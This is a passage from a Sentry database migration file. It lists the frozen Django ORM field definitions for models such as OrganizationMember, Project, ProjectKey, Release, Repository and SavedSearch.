'integration': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Integration']"}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.organizationmember': {
'Meta': {'unique_together': "(('organization', 'user'), ('organization', 'email'))", 'object_name': 'OrganizationMember', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'has_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'member_set'", 'to': "orm['sentry.Organization']"}),
'role': ('django.db.models.fields.CharField', [], {'default': "'member'", 'max_length': '32'}),
'teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationMemberTeam']", 'blank': 'True'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'token_expires_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50', 'blank': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "u'sentry_orgmember_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.organizationmemberteam': {
'Meta': {'unique_together': "(('team', 'organizationmember'),)", 'object_name': 'OrganizationMemberTeam', 'db_table': "'sentry_organizationmember_teams'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'organizationmember': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.OrganizationMember']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.organizationonboardingtask': {
'Meta': {'unique_together': "(('organization', 'task'),)", 'object_name': 'OrganizationOnboardingTask', 'index_together': '()'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'task': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.organizationoption': {
'Meta': {'unique_together': "(('organization', 'key'),)", 'object_name': 'OrganizationOption', 'db_table': "'sentry_organizationoptions'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.platformexternalissue': {
'Meta': {'unique_together': "(('group_id', 'service_type'),)", 'object_name': 'PlatformExternalIssue', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'display_name': ('django.db.models.fields.TextField', [], {}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'service_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'web_url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'sentry.processingissue': {
'Meta': {'unique_together': "(('project', 'checksum', 'type'),)", 'object_name': 'ProcessingIssue', 'index_together': '()'},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40', 'db_index': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
'sentry.project': {
'Meta': {'unique_together': "(('organization', 'slug'),)", 'object_name': 'Project', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'first_event': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0', 'null': 'True'}),
'forced_color': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'teams': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'teams'", 'symmetrical': 'False', 'through': "orm['sentry.ProjectTeam']", 'to': "orm['sentry.Team']"})
},
'sentry.projectavatar': {
'Meta': {'unique_together': '()', 'object_name': 'ProjectAvatar', 'index_together': '()'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'avatar'", 'unique': 'True', 'to': "orm['sentry.Project']"})
},
'sentry.projectbookmark': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'ProjectBookmark', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True', 'blank': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.projectcficachefile': {
'Meta': {'unique_together': "(('project', 'debug_file'),)", 'object_name': 'ProjectCfiCacheFile', 'index_together': '()'},
'cache_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'debug_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ProjectDebugFile']", 'on_delete': 'models.DO_NOTHING', 'db_column': "'dsym_file_id'"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'version': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.projectdebugfile': {
'Meta': {'unique_together': '()', 'object_name': 'ProjectDebugFile', 'db_table': "'sentry_projectdsymfile'", 'index_together': "(('project', 'debug_id'), ('project', 'code_id'))"},
'code_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'cpu_name': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'null': 'True'}),
'debug_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'db_column': "'uuid'"}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'object_name': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'})
},
'sentry.projectintegration': {
'Meta': {'unique_together': "(('project', 'integration'),)", 'object_name': 'ProjectIntegration', 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'integration': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Integration']"}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.projectkey': {
'Meta': {'unique_together': '()', 'object_name': 'ProjectKey', 'index_together': '()'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'key_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'rate_limit_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'rate_limit_window': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'roles': ('django.db.models.fields.BigIntegerField', [], {'default': '1'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.projectownership': {
'Meta': {'unique_together': '()', 'object_name': 'ProjectOwnership', 'index_together': '()'},
'auto_assignment': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'fallthrough': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'unique': 'True'}),
'raw': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'schema': ('sentry.db.models.fields.jsonfield.JSONField', [], {'null': 'True'})
},
'sentry.projectplatform': {
'Meta': {'unique_together': "(('project_id', 'platform'),)", 'object_name': 'ProjectPlatform', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.projectredirect': {
'Meta': {'unique_together': "(('organization', 'redirect_slug'),)", 'object_name': 'ProjectRedirect', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'redirect_slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'})
},
'sentry.projectsymcachefile': {
'Meta': {'unique_together': "(('project', 'debug_file'),)", 'object_name': 'ProjectSymCacheFile', 'index_together': '()'},
'cache_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'debug_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ProjectDebugFile']", 'on_delete': 'models.DO_NOTHING', 'db_column': "'dsym_file_id'"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'version': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.projectteam': {
'Meta': {'unique_together': "(('project', 'team'),)", 'object_name': 'ProjectTeam', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.promptsactivity': {
'Meta': {'unique_together': "(('user', 'feature', 'organization_id', 'project_id'),)", 'object_name': 'PromptsActivity', 'index_together': '()'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'feature': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.pullrequest': {
'Meta': {'unique_together': "(('repository_id', 'key'),)", 'object_name': 'PullRequest', 'db_table': "'sentry_pull_request'", 'index_together': "(('repository_id', 'date_added'), ('organization_id', 'merge_commit_sha'))"},
'author': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.CommitAuthor']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'merge_commit_sha': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'message': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'title': ('django.db.models.fields.TextField', [], {'null': 'True'})
},
'sentry.pullrequestcommit': {
'Meta': {'unique_together': "(('pull_request', 'commit'),)", 'object_name': 'PullRequestCommit', 'db_table': "'sentry_pullrequest_commit'", 'index_together': '()'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'pull_request': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.PullRequest']"})
},
'sentry.rawevent': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'RawEvent', 'index_together': '()'},
'data': ('sentry.db.models.fields.node.NodeField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.recentsearch': {
'Meta': {'unique_together': "(('user', 'organization', 'type', 'query_hash'),)", 'object_name': 'RecentSearch', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'query': ('django.db.models.fields.TextField', [], {}),
'query_hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'type': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.relay': {
'Meta': {'unique_together': '()', 'object_name': 'Relay', 'index_together': '()'},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_internal': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'relay_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'})
},
'sentry.release': {
'Meta': {'unique_together': "(('organization', 'version'),)", 'object_name': 'Release', 'index_together': '()'},
'authors': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'commit_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_released': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_started': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_commit_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'last_deploy_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'new_groups': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'releases'", 'symmetrical': 'False', 'through': "orm['sentry.ReleaseProject']", 'to': "orm['sentry.Project']"}),
'ref': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'total_deploys': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
'sentry.releasecommit': {
'Meta': {'unique_together': "(('release', 'commit'), ('release', 'order'))", 'object_name': 'ReleaseCommit', 'index_together': '()'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'order': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releaseenvironment': {
'Meta': {'unique_together': "(('organization', 'release', 'environment'),)", 'object_name': 'ReleaseEnvironment', 'db_table': "'sentry_environmentrelease'", 'index_together': '()'},
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']"}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releasefile': {
'Meta': {'unique_together': "(('release', 'ident'),)", 'object_name': 'ReleaseFile', 'index_together': "(('release', 'name'),)"},
'dist': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Distribution']", 'null': 'True'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'name': ('django.db.models.fields.TextField', [], {}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releaseheadcommit': {
'Meta': {'unique_together': "(('repository_id', 'release'),)", 'object_name': 'ReleaseHeadCommit', 'index_together': '()'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.releaseproject': {
'Meta': {'unique_together': "(('project', 'release'),)", 'object_name': 'ReleaseProject', 'db_table': "'sentry_release_project'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'new_groups': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releaseprojectenvironment': {
'Meta': {'unique_together': "(('project', 'release', 'environment'),)", 'object_name': 'ReleaseProjectEnvironment', 'index_together': '()'},
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']"}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_deploy_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'new_issues_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.repository': {
'Meta': {'unique_together': "(('organization_id', 'name'), ('organization_id', 'provider', 'external_id'))", 'object_name': 'Repository', 'index_together': '()'},
'config': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'integration_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
},
'sentry.reprocessingreport': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'ReprocessingReport', 'index_together': '()'},
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.rule': {
'Meta': {'unique_together': '()', 'object_name': 'Rule', 'index_together': '()'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'environment_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.savedsearch': {
'Meta': {'unique_together': "(('project', 'name'), ('organization', 'owner', 'type'))", 'object_name': 'SavedSearch', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_global': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'null': 'True'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'query': ('django.db.models.fields.TextField', [], {}),
'type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0', 'null': 'True'})
},
'sentry.savedsearchuserdefault': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'SavedSearchUserDefault', 'db_table': "'sentry_savedsearch_userdefault'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
